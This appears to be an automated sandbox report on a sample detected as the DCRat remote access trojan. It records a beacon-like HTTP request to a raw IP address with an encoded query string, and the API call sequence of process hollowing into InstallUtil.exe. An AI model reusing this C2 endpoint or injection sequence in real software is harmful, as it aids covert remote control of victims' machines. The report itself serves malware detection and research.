Sep 20, 2023 09:47:21.021341085 CEST	185	OUT	GET /voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 85.192.63.134
Sep 20, 2023 09:47:21.275055885 CEST	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Sep 2023 07:47:21 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Target ID:	0
Start time:	09:47:12
Start date:	20/09/2023
Path:	C:\Users\user\Desktop\a9rLzLY498.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\a9rLzLY498.exe
Imagebase:	0x1320000
File size:	2'114'048 bytes
MD5 hash:	5A09955B26DE8ECDFD90121D3E208825
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:47:13
Start date:	20/09/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6eb1a0000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:47:13
Start date:	20/09/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:	0x160000
File size:	41'112 bytes
MD5 hash:	AF862061889F5B9B956E9469DCDAE773
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:47:13
Start date:	20/09/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:	0x790000
File size:	41'112 bytes
MD5 hash:	AF862061889F5B9B956E9469DCDAE773
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000003.00000002.254163988.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000003.00000002.253884261.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	86

Executed Functions

Function 01322540 Relevance: 49.3, APIs: 14, Strings: 14, Instructions: 255
nativethreadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?), ref: 01322568
GetModuleHandleW.KERNEL32(ntdll.dll), ref: 01322586
CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 01322688
VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00001000,00000004), ref: 013226AE
GetThreadContext.KERNELBASE(?,00000000), ref: 013226E3
ReadProcessMemory.KERNELBASE(?,?,00000044,00000004,00000000), ref: 01322712
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 01322735
NtWriteVirtualMemory.NTDLL(?,00000000,01356A70,?,00000000), ref: 01322765
TerminateProcess.KERNELBASE(?,00000005), ref: 01322777
CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 013227F8
NtWriteVirtualMemory.NTDLL(?,00002000,-01356870,00102A00,00000000), ref: 0132284B
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 01322880
SetThreadContext.KERNELBASE(?,00000000), ref: 0132289B
ResumeThread.KERNELBASE(?), ref: 013228B1

Strings

VirtualAllocEx, xrefs: 01322692
GetWindowsDirectoryW, xrefs: 01322588
GetThreadContext, xrefs: 013226B2
ReadProcessMemory, xrefs: 013226ED
kernel32.dll, xrefs: 01322563
CreateProcessW, xrefs: 013225AB
ntdll.dll, xrefs: 01322574
TerminateProcess, xrefs: 01322739
SetThreadContext, xrefs: 013226C9
ZwWriteVirtualMemory, xrefs: 01322596
ET\Framework\v4.0.30319\InstallUtil.exe, xrefs: 0132266A, 013227DA
ResumeThread, xrefs: 0132289F
D, xrefs: 013225BE
\Microsoft.N, xrefs: 01322639, 013227AD

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: Virtual$MemoryProcess$ThreadWrite$AllocContextCreateHandleModule$ReadResumeTerminate
String ID: CreateProcessW$D$ET\Framework\v4.0.30319\InstallUtil.exe$GetThreadContext$GetWindowsDirectoryW$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAllocEx$ZwWriteVirtualMemory$\Microsoft.N$kernel32.dll$ntdll.dll
API String ID: 2993083954-3697918027
Opcode ID: 9f682449ec2fbac0442f5b71dc9e0391d091411c06ba66681ca68099ca9ecc1d
Instruction ID: ef7189a7dd2cde3d9a6b0ee592f3ab06dc2c6572508f61f318b9ba39fcc69745
Opcode Fuzzy Hash: 9f682449ec2fbac0442f5b71dc9e0391d091411c06ba66681ca68099ca9ecc1d
Instruction Fuzzy Hash: 0EA1E175A043049FDB209F28CC41B6BB7E5BFC8B48F404A1CFA55AB391DBB0A8448F56

Uniqueness

Uniqueness Score: -1.00%

Function 0132A6B7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE(0132A6C3,01329B33), ref: 0132A6BC

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 128d2ef7118d12fca3dd0424dd269dcdd6a16992f5cecdcc839f08f19e89da38
Instruction ID: a48c43d90ae4980e236f1483a89921e84c6393edf4ab215e51fdc8ee27aa4d29
Opcode Fuzzy Hash: 128d2ef7118d12fca3dd0424dd269dcdd6a16992f5cecdcc839f08f19e89da38
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 013404B5 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b4fb540ac52640e03edab883d0c110e3fd3b07b94420992bf0eda264adc5033
Instruction ID: 81ccf8928780f65647065c5add6b1b712b72340e6756cc340dcabbde58d1f475
Opcode Fuzzy Hash: 4b4fb540ac52640e03edab883d0c110e3fd3b07b94420992bf0eda264adc5033
Instruction Fuzzy Hash: A4E08C72A11238EBCB28EB8CC904D8AF7ECEB84A14B110096B601F3610C270EE00DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 01334DC5 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c0b25485300886a8ac7243da4b52b6c6a9e7c33ac65ee1175380eaf7e90c9c0
Instruction ID: 17f98388f9513b784f885298b08f1a268ae0f94ac3e81c1286193731bdef7f8e
Opcode Fuzzy Hash: 6c0b25485300886a8ac7243da4b52b6c6a9e7c33ac65ee1175380eaf7e90c9c0
Instruction Fuzzy Hash: D9C08C38100A8047CE2ADB18C6743A433B4B3D168AF80048DC6020B753C51EA8C2DA00

Uniqueness

Uniqueness Score: -1.00%

Function 01337591 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800), ref: 01337650

Strings

api-ms-, xrefs: 013375E6
ext-ms-, xrefs: 013375FA

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: b7bb5b0055c9b6059225185cbd2260b5724b9761d7926f5c90da1581c3428140
Instruction ID: b468bfdbf44ea171d2415dac5f2318accff6e0b95bf5d05eb38feade07d9141a
Opcode Fuzzy Hash: b7bb5b0055c9b6059225185cbd2260b5724b9761d7926f5c90da1581c3428140
Instruction Fuzzy Hash: 72215CB5A00215ABDB329B6CEC50B5A376C9B81778F100214ED05E7296DB30F900DBE8

Uniqueness

Uniqueness Score: -1.00%

Function 01326967 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 0132696E
std::_Lockit::_Lockit.LIBCPMT ref: 01326978

Part of subcall function 01321A30: std::_Lockit::_Lockit.LIBCPMT ref: 01321A4C
Part of subcall function 01321A30: std::_Lockit::~_Lockit.LIBCPMT ref: 01321A69

ctype.LIBCPMT ref: 013269B2
std::_Facet_Register.LIBCPMT ref: 013269C9
std::_Lockit::~_Lockit.LIBCPMT ref: 013269E9
__EH_prolog3.LIBCMT ref: 01326A03

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Facet_Registerctype
String ID:
API String ID: 299345219-0
Opcode ID: ef2c9181242a92aa49128497533181e98147a1347bdcd0132618a2e8466b4810
Instruction ID: 49ccd1054aba2f0c3f66f84bee08be1d95f7896a2534b7d9578c82235bf18b2c
Opcode Fuzzy Hash: ef2c9181242a92aa49128497533181e98147a1347bdcd0132618a2e8466b4810
Instruction Fuzzy Hash: 71318D74A00226DFCB65EF68C541AAEBBF1BF58718F20494DD949AB350DB70EA05CB80

Uniqueness

Uniqueness Score: -1.00%

Function 013228D0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE(?), ref: 013229E1
DdeQueryNextServer.USER32 ref: 01322B19

Strings

dujbe %d, xrefs: 01322A49

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ConsoleFreeNextQueryServer
String ID: dujbe %d
API String ID: 2148023521-1406644930
Opcode ID: 65a68ec1ce278726fe6d5630ead6109521d008a488a9a5d9d75dd60f19cb32c3
Instruction ID: cc4a413c862f5e3fcff57afe97e1f76b64ec6288a1f6cdb270b3e8a675b76182
Opcode Fuzzy Hash: 65a68ec1ce278726fe6d5630ead6109521d008a488a9a5d9d75dd60f19cb32c3
Instruction Fuzzy Hash: 46819E71A083518BD714EF28C84476BBBE1FFD9358F184A1DF99593260EB30E9848B92

Uniqueness

Uniqueness Score: -1.00%

Function 01321920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01321925
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0132196A

Part of subcall function 01327FF1: _Yarn.LIBCPMT ref: 01328010
Part of subcall function 01327FF1: _Yarn.LIBCPMT ref: 01328034

Strings

bad locale name, xrefs: 01321978

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 4bb056879ce71d53964fa742d007769a603469e2d5503307c29653f78fcd3d7b
Instruction ID: 22d61b5b443a30512bf8ae7c330cbf22e35c62cbf63f73b594a1260939719a83
Opcode Fuzzy Hash: 4bb056879ce71d53964fa742d007769a603469e2d5503307c29653f78fcd3d7b
Instruction Fuzzy Hash: A3F09AB0104B908ED370EF398800703BEE0AF28618F048E1ED4CAC3B41E3B4E108CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 01334D51 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(01334EA7,?,01334D4B,00000000,?,?,01334EA7,51F7B458,?,01334EA7), ref: 01334D62
TerminateProcess.KERNEL32(00000000,?,01334D4B,00000000,?,?,01334EA7,51F7B458,?,01334EA7), ref: 01334D69
ExitProcess.KERNEL32 ref: 01334D7B

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: abaee9ef49b33c7e18e920841fcd058f5f1aa4660e0f8e08e74359a5301b19f2
Instruction ID: ae8e8518ea7153a98c3a193e3d0bd6364a025a2505529e2398a1762f6bd3083f
Opcode Fuzzy Hash: abaee9ef49b33c7e18e920841fcd058f5f1aa4660e0f8e08e74359a5301b19f2
Instruction Fuzzy Hash: A5D09235010148BFCF613FA8DC0C98D3F2AEF90745B448050B9094A02ACF39A9969B94

Uniqueness

Uniqueness Score: -1.00%

Function 0133AAE4 Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0133A22E: GetConsoleOutputCP.KERNEL32(51F7B458,00000000,00000000,?), ref: 0133A291

WriteFile.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,?), ref: 0133AC4D
GetLastError.KERNEL32(?,?,?,00000000,?,00000000,?,?), ref: 0133AC57

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 727fd10d2bd3b61e30d7f52ad2e02f59234a9f096165c3b3cec50af90353c0ba
Instruction ID: 62fab1564f7ea9d35b134ec5644e4697ab5790035eb52c28a97297621c41cd02
Opcode Fuzzy Hash: 727fd10d2bd3b61e30d7f52ad2e02f59234a9f096165c3b3cec50af90353c0ba
Instruction Fuzzy Hash: 2961AF71D04249AFEF15CFACC884AEEBFB9AF89318F044585E981E7252D335D905CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0133A6E6 Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,0133AC33,?,00000000,00000000,?,00000000,00000000), ref: 0133A782
GetLastError.KERNEL32(?,0133AC33,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000), ref: 0133A7A8

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 43fc5236d15373a3cba56611de08f1e5561e8fcb6ff835f3aa995d43fa79e33a
Instruction ID: e5505b007ed107431b5bdf2d313800e5290b0267879305592c783b39ebe82503
Opcode Fuzzy Hash: 43fc5236d15373a3cba56611de08f1e5561e8fcb6ff835f3aa995d43fa79e33a
Instruction Fuzzy Hash: 0A21A674A102199FCB16CF59DCC0AD9B7F9EF88305F1440A9EA46D7211D630DE46CB64

Uniqueness

Uniqueness Score: -1.00%

Function 01337CE4 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 01337D30
GetFileType.KERNELBASE(00000000), ref: 01337D42

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 8c82c96d1853bf4dc4e9e3edc38580f5682e823b3bb8f7962b3d8a44eba72b8f
Instruction ID: d7ae69b612ee04d40832964bbb426dfe4987b4f708beb54a2940216d51a7a83c
Opcode Fuzzy Hash: 8c82c96d1853bf4dc4e9e3edc38580f5682e823b3bb8f7962b3d8a44eba72b8f
Instruction Fuzzy Hash: 891196B31047595AD7304D3E8C8CA327E99ABD6139B38071AD1B6875F2C730D586D658

Uniqueness

Uniqueness Score: -1.00%

Function 01328956 Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_Fputc.LIBCPMT ref: 013289C3

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: Fputc
String ID:
API String ID: 3078413507-0
Opcode ID: 1f0241f15436ea2eba1c00d035a0916e043fc3333a6a06682824a4479eb86ed7
Instruction ID: 732cb9b464f452e663c3c185828a6830b5a1dd72fb1583548676074d596ccc08
Opcode Fuzzy Hash: 1f0241f15436ea2eba1c00d035a0916e043fc3333a6a06682824a4479eb86ed7
Instruction Fuzzy Hash: B2316072A0012AAFDF15EF68C8509EEB7F9BF09318F1401A6E541E7640EB31E954CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0133765A Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fffe433d0b2946d02068e81f7e6c097ad678c386ac7829efe7f2184b7ec35e4f
Instruction ID: ce8ff2063dc234d7dd0b50d120037bb6165220b07f4b21ca677140222823dce8
Opcode Fuzzy Hash: fffe433d0b2946d02068e81f7e6c097ad678c386ac7829efe7f2184b7ec35e4f
Instruction Fuzzy Hash: 200128B3310316AFEB268D6DEC5095B37AEFBC57387144120FA05DB188DA30D401A798

Uniqueness

Uniqueness Score: -1.00%

Function 01337322 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,013393BF,00000001,00000364,?,00000005,000000FF,?,01342A90,00000000,013369EF,00000000), ref: 01337363

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 504efbff1730bf70c47d99df8fbc03b6f8ddf379f4bebc9d1b70809327ee66b1
Instruction ID: 085a3a7ff26728a0c51e92f9959517a837ce44f8107c856840a731c00ea9066d
Opcode Fuzzy Hash: 504efbff1730bf70c47d99df8fbc03b6f8ddf379f4bebc9d1b70809327ee66b1
Instruction Fuzzy Hash: 08F0E9B1200625E7EB715A6A9C42B5B3F5CAFC07B8F084011ED04EB194CB30D40086EC

Uniqueness

Uniqueness Score: -1.00%

Function 013269FC Relevance: 1.5, APIs: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 01326A03

